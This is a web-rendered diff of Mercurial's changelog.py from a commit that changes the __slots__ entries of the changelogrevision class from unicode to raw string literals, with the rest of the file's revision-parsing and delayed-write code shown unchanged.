##// END OF EJS Templates
global: use raw strings for __slots__...
Gregory Szorc -
r41997:ae189674 default
parent child Browse files
Show More
@@ -1,582 +1,582 b''
1 # changelog.py - changelog class for mercurial
1 # changelog.py - changelog class for mercurial
2 #
2 #
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 from .i18n import _
10 from .i18n import _
11 from .node import (
11 from .node import (
12 bin,
12 bin,
13 hex,
13 hex,
14 nullid,
14 nullid,
15 )
15 )
16 from .thirdparty import (
16 from .thirdparty import (
17 attr,
17 attr,
18 )
18 )
19
19
20 from . import (
20 from . import (
21 encoding,
21 encoding,
22 error,
22 error,
23 pycompat,
23 pycompat,
24 revlog,
24 revlog,
25 util,
25 util,
26 )
26 )
27 from .utils import (
27 from .utils import (
28 dateutil,
28 dateutil,
29 stringutil,
29 stringutil,
30 )
30 )
31
31
32 _defaultextra = {'branch': 'default'}
32 _defaultextra = {'branch': 'default'}
33
33
34 def _string_escape(text):
34 def _string_escape(text):
35 """
35 """
36 >>> from .pycompat import bytechr as chr
36 >>> from .pycompat import bytechr as chr
37 >>> d = {b'nl': chr(10), b'bs': chr(92), b'cr': chr(13), b'nul': chr(0)}
37 >>> d = {b'nl': chr(10), b'bs': chr(92), b'cr': chr(13), b'nul': chr(0)}
38 >>> s = b"ab%(nl)scd%(bs)s%(bs)sn%(nul)sab%(cr)scd%(bs)s%(nl)s" % d
38 >>> s = b"ab%(nl)scd%(bs)s%(bs)sn%(nul)sab%(cr)scd%(bs)s%(nl)s" % d
39 >>> s
39 >>> s
40 'ab\\ncd\\\\\\\\n\\x00ab\\rcd\\\\\\n'
40 'ab\\ncd\\\\\\\\n\\x00ab\\rcd\\\\\\n'
41 >>> res = _string_escape(s)
41 >>> res = _string_escape(s)
42 >>> s == stringutil.unescapestr(res)
42 >>> s == stringutil.unescapestr(res)
43 True
43 True
44 """
44 """
45 # subset of the string_escape codec
45 # subset of the string_escape codec
46 text = text.replace('\\', '\\\\').replace('\n', '\\n').replace('\r', '\\r')
46 text = text.replace('\\', '\\\\').replace('\n', '\\n').replace('\r', '\\r')
47 return text.replace('\0', '\\0')
47 return text.replace('\0', '\\0')
48
48
49 def decodeextra(text):
49 def decodeextra(text):
50 """
50 """
51 >>> from .pycompat import bytechr as chr
51 >>> from .pycompat import bytechr as chr
52 >>> sorted(decodeextra(encodeextra({b'foo': b'bar', b'baz': chr(0) + b'2'})
52 >>> sorted(decodeextra(encodeextra({b'foo': b'bar', b'baz': chr(0) + b'2'})
53 ... ).items())
53 ... ).items())
54 [('baz', '\\x002'), ('branch', 'default'), ('foo', 'bar')]
54 [('baz', '\\x002'), ('branch', 'default'), ('foo', 'bar')]
55 >>> sorted(decodeextra(encodeextra({b'foo': b'bar',
55 >>> sorted(decodeextra(encodeextra({b'foo': b'bar',
56 ... b'baz': chr(92) + chr(0) + b'2'})
56 ... b'baz': chr(92) + chr(0) + b'2'})
57 ... ).items())
57 ... ).items())
58 [('baz', '\\\\\\x002'), ('branch', 'default'), ('foo', 'bar')]
58 [('baz', '\\\\\\x002'), ('branch', 'default'), ('foo', 'bar')]
59 """
59 """
60 extra = _defaultextra.copy()
60 extra = _defaultextra.copy()
61 for l in text.split('\0'):
61 for l in text.split('\0'):
62 if l:
62 if l:
63 if '\\0' in l:
63 if '\\0' in l:
64 # fix up \0 without getting into trouble with \\0
64 # fix up \0 without getting into trouble with \\0
65 l = l.replace('\\\\', '\\\\\n')
65 l = l.replace('\\\\', '\\\\\n')
66 l = l.replace('\\0', '\0')
66 l = l.replace('\\0', '\0')
67 l = l.replace('\n', '')
67 l = l.replace('\n', '')
68 k, v = stringutil.unescapestr(l).split(':', 1)
68 k, v = stringutil.unescapestr(l).split(':', 1)
69 extra[k] = v
69 extra[k] = v
70 return extra
70 return extra
71
71
72 def encodeextra(d):
72 def encodeextra(d):
73 # keys must be sorted to produce a deterministic changelog entry
73 # keys must be sorted to produce a deterministic changelog entry
74 items = [
74 items = [
75 _string_escape('%s:%s' % (k, pycompat.bytestr(d[k])))
75 _string_escape('%s:%s' % (k, pycompat.bytestr(d[k])))
76 for k in sorted(d)
76 for k in sorted(d)
77 ]
77 ]
78 return "\0".join(items)
78 return "\0".join(items)
79
79
80 def stripdesc(desc):
80 def stripdesc(desc):
81 """strip trailing whitespace and leading and trailing empty lines"""
81 """strip trailing whitespace and leading and trailing empty lines"""
82 return '\n'.join([l.rstrip() for l in desc.splitlines()]).strip('\n')
82 return '\n'.join([l.rstrip() for l in desc.splitlines()]).strip('\n')
83
83
84 class appender(object):
84 class appender(object):
85 '''the changelog index must be updated last on disk, so we use this class
85 '''the changelog index must be updated last on disk, so we use this class
86 to delay writes to it'''
86 to delay writes to it'''
87 def __init__(self, vfs, name, mode, buf):
87 def __init__(self, vfs, name, mode, buf):
88 self.data = buf
88 self.data = buf
89 fp = vfs(name, mode)
89 fp = vfs(name, mode)
90 self.fp = fp
90 self.fp = fp
91 self.offset = fp.tell()
91 self.offset = fp.tell()
92 self.size = vfs.fstat(fp).st_size
92 self.size = vfs.fstat(fp).st_size
93 self._end = self.size
93 self._end = self.size
94
94
95 def end(self):
95 def end(self):
96 return self._end
96 return self._end
97 def tell(self):
97 def tell(self):
98 return self.offset
98 return self.offset
99 def flush(self):
99 def flush(self):
100 pass
100 pass
101
101
102 @property
102 @property
103 def closed(self):
103 def closed(self):
104 return self.fp.closed
104 return self.fp.closed
105
105
106 def close(self):
106 def close(self):
107 self.fp.close()
107 self.fp.close()
108
108
109 def seek(self, offset, whence=0):
109 def seek(self, offset, whence=0):
110 '''virtual file offset spans real file and data'''
110 '''virtual file offset spans real file and data'''
111 if whence == 0:
111 if whence == 0:
112 self.offset = offset
112 self.offset = offset
113 elif whence == 1:
113 elif whence == 1:
114 self.offset += offset
114 self.offset += offset
115 elif whence == 2:
115 elif whence == 2:
116 self.offset = self.end() + offset
116 self.offset = self.end() + offset
117 if self.offset < self.size:
117 if self.offset < self.size:
118 self.fp.seek(self.offset)
118 self.fp.seek(self.offset)
119
119
120 def read(self, count=-1):
120 def read(self, count=-1):
121 '''only trick here is reads that span real file and data'''
121 '''only trick here is reads that span real file and data'''
122 ret = ""
122 ret = ""
123 if self.offset < self.size:
123 if self.offset < self.size:
124 s = self.fp.read(count)
124 s = self.fp.read(count)
125 ret = s
125 ret = s
126 self.offset += len(s)
126 self.offset += len(s)
127 if count > 0:
127 if count > 0:
128 count -= len(s)
128 count -= len(s)
129 if count != 0:
129 if count != 0:
130 doff = self.offset - self.size
130 doff = self.offset - self.size
131 self.data.insert(0, "".join(self.data))
131 self.data.insert(0, "".join(self.data))
132 del self.data[1:]
132 del self.data[1:]
133 s = self.data[0][doff:doff + count]
133 s = self.data[0][doff:doff + count]
134 self.offset += len(s)
134 self.offset += len(s)
135 ret += s
135 ret += s
136 return ret
136 return ret
137
137
138 def write(self, s):
138 def write(self, s):
139 self.data.append(bytes(s))
139 self.data.append(bytes(s))
140 self.offset += len(s)
140 self.offset += len(s)
141 self._end += len(s)
141 self._end += len(s)
142
142
143 def __enter__(self):
143 def __enter__(self):
144 self.fp.__enter__()
144 self.fp.__enter__()
145 return self
145 return self
146
146
147 def __exit__(self, *args):
147 def __exit__(self, *args):
148 return self.fp.__exit__(*args)
148 return self.fp.__exit__(*args)
149
149
150 def _divertopener(opener, target):
150 def _divertopener(opener, target):
151 """build an opener that writes in 'target.a' instead of 'target'"""
151 """build an opener that writes in 'target.a' instead of 'target'"""
152 def _divert(name, mode='r', checkambig=False):
152 def _divert(name, mode='r', checkambig=False):
153 if name != target:
153 if name != target:
154 return opener(name, mode)
154 return opener(name, mode)
155 return opener(name + ".a", mode)
155 return opener(name + ".a", mode)
156 return _divert
156 return _divert
157
157
158 def _delayopener(opener, target, buf):
158 def _delayopener(opener, target, buf):
159 """build an opener that stores chunks in 'buf' instead of 'target'"""
159 """build an opener that stores chunks in 'buf' instead of 'target'"""
160 def _delay(name, mode='r', checkambig=False):
160 def _delay(name, mode='r', checkambig=False):
161 if name != target:
161 if name != target:
162 return opener(name, mode)
162 return opener(name, mode)
163 return appender(opener, name, mode, buf)
163 return appender(opener, name, mode, buf)
164 return _delay
164 return _delay
165
165
166 @attr.s
166 @attr.s
167 class _changelogrevision(object):
167 class _changelogrevision(object):
168 # Extensions might modify _defaultextra, so let the constructor below pass
168 # Extensions might modify _defaultextra, so let the constructor below pass
169 # it in
169 # it in
170 extra = attr.ib()
170 extra = attr.ib()
171 manifest = attr.ib(default=nullid)
171 manifest = attr.ib(default=nullid)
172 user = attr.ib(default='')
172 user = attr.ib(default='')
173 date = attr.ib(default=(0, 0))
173 date = attr.ib(default=(0, 0))
174 files = attr.ib(default=attr.Factory(list))
174 files = attr.ib(default=attr.Factory(list))
175 description = attr.ib(default='')
175 description = attr.ib(default='')
176
176
177 class changelogrevision(object):
177 class changelogrevision(object):
178 """Holds results of a parsed changelog revision.
178 """Holds results of a parsed changelog revision.
179
179
180 Changelog revisions consist of multiple pieces of data, including
180 Changelog revisions consist of multiple pieces of data, including
181 the manifest node, user, and date. This object exposes a view into
181 the manifest node, user, and date. This object exposes a view into
182 the parsed object.
182 the parsed object.
183 """
183 """
184
184
185 __slots__ = (
185 __slots__ = (
186 u'_offsets',
186 r'_offsets',
187 u'_text',
187 r'_text',
188 )
188 )
189
189
190 def __new__(cls, text):
190 def __new__(cls, text):
191 if not text:
191 if not text:
192 return _changelogrevision(extra=_defaultextra)
192 return _changelogrevision(extra=_defaultextra)
193
193
194 self = super(changelogrevision, cls).__new__(cls)
194 self = super(changelogrevision, cls).__new__(cls)
195 # We could return here and implement the following as an __init__.
195 # We could return here and implement the following as an __init__.
196 # But doing it here is equivalent and saves an extra function call.
196 # But doing it here is equivalent and saves an extra function call.
197
197
198 # format used:
198 # format used:
199 # nodeid\n : manifest node in ascii
199 # nodeid\n : manifest node in ascii
200 # user\n : user, no \n or \r allowed
200 # user\n : user, no \n or \r allowed
201 # time tz extra\n : date (time is int or float, timezone is int)
201 # time tz extra\n : date (time is int or float, timezone is int)
202 # : extra is metadata, encoded and separated by '\0'
202 # : extra is metadata, encoded and separated by '\0'
203 # : older versions ignore it
203 # : older versions ignore it
204 # files\n\n : files modified by the cset, no \n or \r allowed
204 # files\n\n : files modified by the cset, no \n or \r allowed
205 # (.*) : comment (free text, ideally utf-8)
205 # (.*) : comment (free text, ideally utf-8)
206 #
206 #
207 # changelog v0 doesn't use extra
207 # changelog v0 doesn't use extra
208
208
209 nl1 = text.index('\n')
209 nl1 = text.index('\n')
210 nl2 = text.index('\n', nl1 + 1)
210 nl2 = text.index('\n', nl1 + 1)
211 nl3 = text.index('\n', nl2 + 1)
211 nl3 = text.index('\n', nl2 + 1)
212
212
213 # The list of files may be empty. Which means nl3 is the first of the
213 # The list of files may be empty. Which means nl3 is the first of the
214 # double newline that precedes the description.
214 # double newline that precedes the description.
215 if text[nl3 + 1:nl3 + 2] == '\n':
215 if text[nl3 + 1:nl3 + 2] == '\n':
216 doublenl = nl3
216 doublenl = nl3
217 else:
217 else:
218 doublenl = text.index('\n\n', nl3 + 1)
218 doublenl = text.index('\n\n', nl3 + 1)
219
219
220 self._offsets = (nl1, nl2, nl3, doublenl)
220 self._offsets = (nl1, nl2, nl3, doublenl)
221 self._text = text
221 self._text = text
222
222
223 return self
223 return self
224
224
225 @property
225 @property
226 def manifest(self):
226 def manifest(self):
227 return bin(self._text[0:self._offsets[0]])
227 return bin(self._text[0:self._offsets[0]])
228
228
229 @property
229 @property
230 def user(self):
230 def user(self):
231 off = self._offsets
231 off = self._offsets
232 return encoding.tolocal(self._text[off[0] + 1:off[1]])
232 return encoding.tolocal(self._text[off[0] + 1:off[1]])
233
233
234 @property
234 @property
235 def _rawdate(self):
235 def _rawdate(self):
236 off = self._offsets
236 off = self._offsets
237 dateextra = self._text[off[1] + 1:off[2]]
237 dateextra = self._text[off[1] + 1:off[2]]
238 return dateextra.split(' ', 2)[0:2]
238 return dateextra.split(' ', 2)[0:2]
239
239
240 @property
240 @property
241 def _rawextra(self):
241 def _rawextra(self):
242 off = self._offsets
242 off = self._offsets
243 dateextra = self._text[off[1] + 1:off[2]]
243 dateextra = self._text[off[1] + 1:off[2]]
244 fields = dateextra.split(' ', 2)
244 fields = dateextra.split(' ', 2)
245 if len(fields) != 3:
245 if len(fields) != 3:
246 return None
246 return None
247
247
248 return fields[2]
248 return fields[2]
249
249
250 @property
250 @property
251 def date(self):
251 def date(self):
252 raw = self._rawdate
252 raw = self._rawdate
253 time = float(raw[0])
253 time = float(raw[0])
254 # Various tools did silly things with the timezone.
254 # Various tools did silly things with the timezone.
255 try:
255 try:
256 timezone = int(raw[1])
256 timezone = int(raw[1])
257 except ValueError:
257 except ValueError:
258 timezone = 0
258 timezone = 0
259
259
260 return time, timezone
260 return time, timezone
261
261
262 @property
262 @property
263 def extra(self):
263 def extra(self):
264 raw = self._rawextra
264 raw = self._rawextra
265 if raw is None:
265 if raw is None:
266 return _defaultextra
266 return _defaultextra
267
267
268 return decodeextra(raw)
268 return decodeextra(raw)
269
269
270 @property
270 @property
271 def files(self):
271 def files(self):
272 off = self._offsets
272 off = self._offsets
273 if off[2] == off[3]:
273 if off[2] == off[3]:
274 return []
274 return []
275
275
276 return self._text[off[2] + 1:off[3]].split('\n')
276 return self._text[off[2] + 1:off[3]].split('\n')
277
277
278 @property
278 @property
279 def description(self):
279 def description(self):
280 return encoding.tolocal(self._text[self._offsets[3] + 2:])
280 return encoding.tolocal(self._text[self._offsets[3] + 2:])
281
281
282 class changelog(revlog.revlog):
282 class changelog(revlog.revlog):
283 def __init__(self, opener, trypending=False):
283 def __init__(self, opener, trypending=False):
284 """Load a changelog revlog using an opener.
284 """Load a changelog revlog using an opener.
285
285
286 If ``trypending`` is true, we attempt to load the index from a
286 If ``trypending`` is true, we attempt to load the index from a
287 ``00changelog.i.a`` file instead of the default ``00changelog.i``.
287 ``00changelog.i.a`` file instead of the default ``00changelog.i``.
288 The ``00changelog.i.a`` file contains index (and possibly inline
288 The ``00changelog.i.a`` file contains index (and possibly inline
289 revision) data for a transaction that hasn't been finalized yet.
289 revision) data for a transaction that hasn't been finalized yet.
290 It exists in a separate file to facilitate readers (such as
290 It exists in a separate file to facilitate readers (such as
291 hooks processes) accessing data before a transaction is finalized.
291 hooks processes) accessing data before a transaction is finalized.
292 """
292 """
293 if trypending and opener.exists('00changelog.i.a'):
293 if trypending and opener.exists('00changelog.i.a'):
294 indexfile = '00changelog.i.a'
294 indexfile = '00changelog.i.a'
295 else:
295 else:
296 indexfile = '00changelog.i'
296 indexfile = '00changelog.i'
297
297
298 datafile = '00changelog.d'
298 datafile = '00changelog.d'
299 revlog.revlog.__init__(self, opener, indexfile, datafile=datafile,
299 revlog.revlog.__init__(self, opener, indexfile, datafile=datafile,
300 checkambig=True, mmaplargeindex=True)
300 checkambig=True, mmaplargeindex=True)
301
301
302 if self._initempty and (self.version & 0xFFFF == revlog.REVLOGV1):
302 if self._initempty and (self.version & 0xFFFF == revlog.REVLOGV1):
303 # changelogs don't benefit from generaldelta.
303 # changelogs don't benefit from generaldelta.
304
304
305 self.version &= ~revlog.FLAG_GENERALDELTA
305 self.version &= ~revlog.FLAG_GENERALDELTA
306 self._generaldelta = False
306 self._generaldelta = False
307
307
308 # Delta chains for changelogs tend to be very small because entries
308 # Delta chains for changelogs tend to be very small because entries
309 # tend to be small and don't delta well with each. So disable delta
309 # tend to be small and don't delta well with each. So disable delta
310 # chains.
310 # chains.
311 self._storedeltachains = False
311 self._storedeltachains = False
312
312
313 self._realopener = opener
313 self._realopener = opener
314 self._delayed = False
314 self._delayed = False
315 self._delaybuf = None
315 self._delaybuf = None
316 self._divert = False
316 self._divert = False
317 self.filteredrevs = frozenset()
317 self.filteredrevs = frozenset()
318
318
319 def tiprev(self):
319 def tiprev(self):
320 for i in pycompat.xrange(len(self) -1, -2, -1):
320 for i in pycompat.xrange(len(self) -1, -2, -1):
321 if i not in self.filteredrevs:
321 if i not in self.filteredrevs:
322 return i
322 return i
323
323
324 def tip(self):
324 def tip(self):
325 """filtered version of revlog.tip"""
325 """filtered version of revlog.tip"""
326 return self.node(self.tiprev())
326 return self.node(self.tiprev())
327
327
328 def __contains__(self, rev):
328 def __contains__(self, rev):
329 """filtered version of revlog.__contains__"""
329 """filtered version of revlog.__contains__"""
330 return (0 <= rev < len(self)
330 return (0 <= rev < len(self)
331 and rev not in self.filteredrevs)
331 and rev not in self.filteredrevs)
332
332
333 def __iter__(self):
333 def __iter__(self):
334 """filtered version of revlog.__iter__"""
334 """filtered version of revlog.__iter__"""
335 if len(self.filteredrevs) == 0:
335 if len(self.filteredrevs) == 0:
336 return revlog.revlog.__iter__(self)
336 return revlog.revlog.__iter__(self)
337
337
338 def filterediter():
338 def filterediter():
339 for i in pycompat.xrange(len(self)):
339 for i in pycompat.xrange(len(self)):
340 if i not in self.filteredrevs:
340 if i not in self.filteredrevs:
341 yield i
341 yield i
342
342
343 return filterediter()
343 return filterediter()
344
344
345 def revs(self, start=0, stop=None):
345 def revs(self, start=0, stop=None):
346 """filtered version of revlog.revs"""
346 """filtered version of revlog.revs"""
347 for i in super(changelog, self).revs(start, stop):
347 for i in super(changelog, self).revs(start, stop):
348 if i not in self.filteredrevs:
348 if i not in self.filteredrevs:
349 yield i
349 yield i
350
350
351 def reachableroots(self, minroot, heads, roots, includepath=False):
351 def reachableroots(self, minroot, heads, roots, includepath=False):
352 return self.index.reachableroots2(minroot, heads, roots, includepath)
352 return self.index.reachableroots2(minroot, heads, roots, includepath)
353
353
354 def _checknofilteredinrevs(self, revs):
354 def _checknofilteredinrevs(self, revs):
355 """raise the appropriate error if 'revs' contains a filtered revision
355 """raise the appropriate error if 'revs' contains a filtered revision
356
356
357 This returns a version of 'revs' to be used thereafter by the caller.
357 This returns a version of 'revs' to be used thereafter by the caller.
358 In particular, if revs is an iterator, it is converted into a set.
358 In particular, if revs is an iterator, it is converted into a set.
359 """
359 """
360 safehasattr = util.safehasattr
360 safehasattr = util.safehasattr
361 if safehasattr(revs, '__next__'):
361 if safehasattr(revs, '__next__'):
362 # Note that inspect.isgenerator() is not true for iterators,
362 # Note that inspect.isgenerator() is not true for iterators,
363 revs = set(revs)
363 revs = set(revs)
364
364
365 filteredrevs = self.filteredrevs
365 filteredrevs = self.filteredrevs
366 if safehasattr(revs, 'first'): # smartset
366 if safehasattr(revs, 'first'): # smartset
367 offenders = revs & filteredrevs
367 offenders = revs & filteredrevs
368 else:
368 else:
369 offenders = filteredrevs.intersection(revs)
369 offenders = filteredrevs.intersection(revs)
370
370
371 for rev in offenders:
371 for rev in offenders:
372 raise error.FilteredIndexError(rev)
372 raise error.FilteredIndexError(rev)
373 return revs
373 return revs
374
374
375 def headrevs(self, revs=None):
375 def headrevs(self, revs=None):
376 if revs is None and self.filteredrevs:
376 if revs is None and self.filteredrevs:
377 try:
377 try:
378 return self.index.headrevsfiltered(self.filteredrevs)
378 return self.index.headrevsfiltered(self.filteredrevs)
379 # AttributeError covers non-c-extension environments and
379 # AttributeError covers non-c-extension environments and
380 # old c extensions without filter handling.
380 # old c extensions without filter handling.
381 except AttributeError:
381 except AttributeError:
382 return self._headrevs()
382 return self._headrevs()
383
383
384 if self.filteredrevs:
384 if self.filteredrevs:
385 revs = self._checknofilteredinrevs(revs)
385 revs = self._checknofilteredinrevs(revs)
386 return super(changelog, self).headrevs(revs)
386 return super(changelog, self).headrevs(revs)
387
387
388 def strip(self, *args, **kwargs):
388 def strip(self, *args, **kwargs):
389 # XXX make something better than assert
389 # XXX make something better than assert
390 # We can't expect proper strip behavior if we are filtered.
390 # We can't expect proper strip behavior if we are filtered.
391 assert not self.filteredrevs
391 assert not self.filteredrevs
392 super(changelog, self).strip(*args, **kwargs)
392 super(changelog, self).strip(*args, **kwargs)
393
393
394 def rev(self, node):
394 def rev(self, node):
395 """filtered version of revlog.rev"""
395 """filtered version of revlog.rev"""
396 r = super(changelog, self).rev(node)
396 r = super(changelog, self).rev(node)
397 if r in self.filteredrevs:
397 if r in self.filteredrevs:
398 raise error.FilteredLookupError(hex(node), self.indexfile,
398 raise error.FilteredLookupError(hex(node), self.indexfile,
399 _('filtered node'))
399 _('filtered node'))
400 return r
400 return r
401
401
402 def node(self, rev):
402 def node(self, rev):
403 """filtered version of revlog.node"""
403 """filtered version of revlog.node"""
404 if rev in self.filteredrevs:
404 if rev in self.filteredrevs:
405 raise error.FilteredIndexError(rev)
405 raise error.FilteredIndexError(rev)
406 return super(changelog, self).node(rev)
406 return super(changelog, self).node(rev)
407
407
408 def linkrev(self, rev):
408 def linkrev(self, rev):
409 """filtered version of revlog.linkrev"""
409 """filtered version of revlog.linkrev"""
410 if rev in self.filteredrevs:
410 if rev in self.filteredrevs:
411 raise error.FilteredIndexError(rev)
411 raise error.FilteredIndexError(rev)
412 return super(changelog, self).linkrev(rev)
412 return super(changelog, self).linkrev(rev)
413
413
414 def parentrevs(self, rev):
414 def parentrevs(self, rev):
415 """filtered version of revlog.parentrevs"""
415 """filtered version of revlog.parentrevs"""
416 if rev in self.filteredrevs:
416 if rev in self.filteredrevs:
417 raise error.FilteredIndexError(rev)
417 raise error.FilteredIndexError(rev)
418 return super(changelog, self).parentrevs(rev)
418 return super(changelog, self).parentrevs(rev)
419
419
420 def flags(self, rev):
420 def flags(self, rev):
421 """filtered version of revlog.flags"""
421 """filtered version of revlog.flags"""
422 if rev in self.filteredrevs:
422 if rev in self.filteredrevs:
423 raise error.FilteredIndexError(rev)
423 raise error.FilteredIndexError(rev)
424 return super(changelog, self).flags(rev)
424 return super(changelog, self).flags(rev)
425
425
426 def delayupdate(self, tr):
426 def delayupdate(self, tr):
427 "delay visibility of index updates to other readers"
427 "delay visibility of index updates to other readers"
428
428
429 if not self._delayed:
429 if not self._delayed:
430 if len(self) == 0:
430 if len(self) == 0:
431 self._divert = True
431 self._divert = True
432 if self._realopener.exists(self.indexfile + '.a'):
432 if self._realopener.exists(self.indexfile + '.a'):
433 self._realopener.unlink(self.indexfile + '.a')
433 self._realopener.unlink(self.indexfile + '.a')
434 self.opener = _divertopener(self._realopener, self.indexfile)
434 self.opener = _divertopener(self._realopener, self.indexfile)
435 else:
435 else:
436 self._delaybuf = []
436 self._delaybuf = []
437 self.opener = _delayopener(self._realopener, self.indexfile,
437 self.opener = _delayopener(self._realopener, self.indexfile,
438 self._delaybuf)
438 self._delaybuf)
439 self._delayed = True
439 self._delayed = True
440 tr.addpending('cl-%i' % id(self), self._writepending)
440 tr.addpending('cl-%i' % id(self), self._writepending)
441 tr.addfinalize('cl-%i' % id(self), self._finalize)
441 tr.addfinalize('cl-%i' % id(self), self._finalize)
442
442
443 def _finalize(self, tr):
443 def _finalize(self, tr):
444 "finalize index updates"
444 "finalize index updates"
445 self._delayed = False
445 self._delayed = False
446 self.opener = self._realopener
446 self.opener = self._realopener
447 # move redirected index data back into place
447 # move redirected index data back into place
448 if self._divert:
448 if self._divert:
449 assert not self._delaybuf
449 assert not self._delaybuf
450 tmpname = self.indexfile + ".a"
450 tmpname = self.indexfile + ".a"
451 nfile = self.opener.open(tmpname)
451 nfile = self.opener.open(tmpname)
452 nfile.close()
452 nfile.close()
453 self.opener.rename(tmpname, self.indexfile, checkambig=True)
453 self.opener.rename(tmpname, self.indexfile, checkambig=True)
454 elif self._delaybuf:
454 elif self._delaybuf:
455 fp = self.opener(self.indexfile, 'a', checkambig=True)
455 fp = self.opener(self.indexfile, 'a', checkambig=True)
456 fp.write("".join(self._delaybuf))
456 fp.write("".join(self._delaybuf))
457 fp.close()
457 fp.close()
458 self._delaybuf = None
458 self._delaybuf = None
459 self._divert = False
459 self._divert = False
460 # split when we're done
460 # split when we're done
461 self._enforceinlinesize(tr)
461 self._enforceinlinesize(tr)
462
462
463 def _writepending(self, tr):
463 def _writepending(self, tr):
464 "create a file containing the unfinalized state for pretxnchangegroup"
464 "create a file containing the unfinalized state for pretxnchangegroup"
465 if self._delaybuf:
465 if self._delaybuf:
466 # make a temporary copy of the index
466 # make a temporary copy of the index
467 fp1 = self._realopener(self.indexfile)
467 fp1 = self._realopener(self.indexfile)
468 pendingfilename = self.indexfile + ".a"
468 pendingfilename = self.indexfile + ".a"
469 # register as a temp file to ensure cleanup on failure
469 # register as a temp file to ensure cleanup on failure
470 tr.registertmp(pendingfilename)
470 tr.registertmp(pendingfilename)
471 # write existing data
471 # write existing data
472 fp2 = self._realopener(pendingfilename, "w")
472 fp2 = self._realopener(pendingfilename, "w")
473 fp2.write(fp1.read())
473 fp2.write(fp1.read())
474 # add pending data
474 # add pending data
475 fp2.write("".join(self._delaybuf))
475 fp2.write("".join(self._delaybuf))
476 fp2.close()
476 fp2.close()
477 # switch modes so finalize can simply rename
477 # switch modes so finalize can simply rename
478 self._delaybuf = None
478 self._delaybuf = None
479 self._divert = True
479 self._divert = True
480 self.opener = _divertopener(self._realopener, self.indexfile)
480 self.opener = _divertopener(self._realopener, self.indexfile)
481
481
482 if self._divert:
482 if self._divert:
483 return True
483 return True
484
484
485 return False
485 return False
486
486
487 def _enforceinlinesize(self, tr, fp=None):
487 def _enforceinlinesize(self, tr, fp=None):
488 if not self._delayed:
488 if not self._delayed:
489 revlog.revlog._enforceinlinesize(self, tr, fp)
489 revlog.revlog._enforceinlinesize(self, tr, fp)
490
490
491 def read(self, node):
491 def read(self, node):
492 """Obtain data from a parsed changelog revision.
492 """Obtain data from a parsed changelog revision.
493
493
494 Returns a 6-tuple of:
494 Returns a 6-tuple of:
495
495
496 - manifest node in binary
496 - manifest node in binary
497 - author/user as a localstr
497 - author/user as a localstr
498 - date as a 2-tuple of (time, timezone)
498 - date as a 2-tuple of (time, timezone)
499 - list of files
499 - list of files
500 - commit message as a localstr
500 - commit message as a localstr
501 - dict of extra metadata
501 - dict of extra metadata
502
502
503 Unless you need to access all fields, consider calling
503 Unless you need to access all fields, consider calling
504 ``changelogrevision`` instead, as it is faster for partial object
504 ``changelogrevision`` instead, as it is faster for partial object
505 access.
505 access.
506 """
506 """
507 c = changelogrevision(self.revision(node))
507 c = changelogrevision(self.revision(node))
508 return (
508 return (
509 c.manifest,
509 c.manifest,
510 c.user,
510 c.user,
511 c.date,
511 c.date,
512 c.files,
512 c.files,
513 c.description,
513 c.description,
514 c.extra
514 c.extra
515 )
515 )
516
516
517 def changelogrevision(self, nodeorrev):
517 def changelogrevision(self, nodeorrev):
518 """Obtain a ``changelogrevision`` for a node or revision."""
518 """Obtain a ``changelogrevision`` for a node or revision."""
519 return changelogrevision(self.revision(nodeorrev))
519 return changelogrevision(self.revision(nodeorrev))
520
520
521 def readfiles(self, node):
521 def readfiles(self, node):
522 """
522 """
523 short version of read that only returns the files modified by the cset
523 short version of read that only returns the files modified by the cset
524 """
524 """
525 text = self.revision(node)
525 text = self.revision(node)
526 if not text:
526 if not text:
527 return []
527 return []
528 last = text.index("\n\n")
528 last = text.index("\n\n")
529 l = text[:last].split('\n')
529 l = text[:last].split('\n')
530 return l[3:]
530 return l[3:]
531
531
532 def add(self, manifest, files, desc, transaction, p1, p2,
532 def add(self, manifest, files, desc, transaction, p1, p2,
533 user, date=None, extra=None):
533 user, date=None, extra=None):
534 # Convert to UTF-8 encoded bytestrings as the very first
534 # Convert to UTF-8 encoded bytestrings as the very first
535 # thing: calling any method on a localstr object will turn it
535 # thing: calling any method on a localstr object will turn it
536 # into a str object and the cached UTF-8 string is thus lost.
536 # into a str object and the cached UTF-8 string is thus lost.
537 user, desc = encoding.fromlocal(user), encoding.fromlocal(desc)
537 user, desc = encoding.fromlocal(user), encoding.fromlocal(desc)
538
538
539 user = user.strip()
539 user = user.strip()
540 # An empty username or a username with a "\n" will make the
540 # An empty username or a username with a "\n" will make the
541 # revision text contain two "\n\n" sequences -> corrupt
541 # revision text contain two "\n\n" sequences -> corrupt
542 # repository since read cannot unpack the revision.
542 # repository since read cannot unpack the revision.
543 if not user:
543 if not user:
544 raise error.StorageError(_("empty username"))
544 raise error.StorageError(_("empty username"))
545 if "\n" in user:
545 if "\n" in user:
546 raise error.StorageError(_("username %r contains a newline")
546 raise error.StorageError(_("username %r contains a newline")
547 % pycompat.bytestr(user))
547 % pycompat.bytestr(user))
548
548
549 desc = stripdesc(desc)
549 desc = stripdesc(desc)
550
550
551 if date:
551 if date:
552 parseddate = "%d %d" % dateutil.parsedate(date)
552 parseddate = "%d %d" % dateutil.parsedate(date)
553 else:
553 else:
554 parseddate = "%d %d" % dateutil.makedate()
554 parseddate = "%d %d" % dateutil.makedate()
555 if extra:
555 if extra:
556 branch = extra.get("branch")
556 branch = extra.get("branch")
557 if branch in ("default", ""):
557 if branch in ("default", ""):
558 del extra["branch"]
558 del extra["branch"]
559 elif branch in (".", "null", "tip"):
559 elif branch in (".", "null", "tip"):
560 raise error.StorageError(_('the name \'%s\' is reserved')
560 raise error.StorageError(_('the name \'%s\' is reserved')
561 % branch)
561 % branch)
562 if extra:
562 if extra:
563 extra = encodeextra(extra)
563 extra = encodeextra(extra)
564 parseddate = "%s %s" % (parseddate, extra)
564 parseddate = "%s %s" % (parseddate, extra)
565 l = [hex(manifest), user, parseddate] + sorted(files) + ["", desc]
565 l = [hex(manifest), user, parseddate] + sorted(files) + ["", desc]
566 text = "\n".join(l)
566 text = "\n".join(l)
567 return self.addrevision(text, transaction, len(self), p1, p2)
567 return self.addrevision(text, transaction, len(self), p1, p2)
568
568
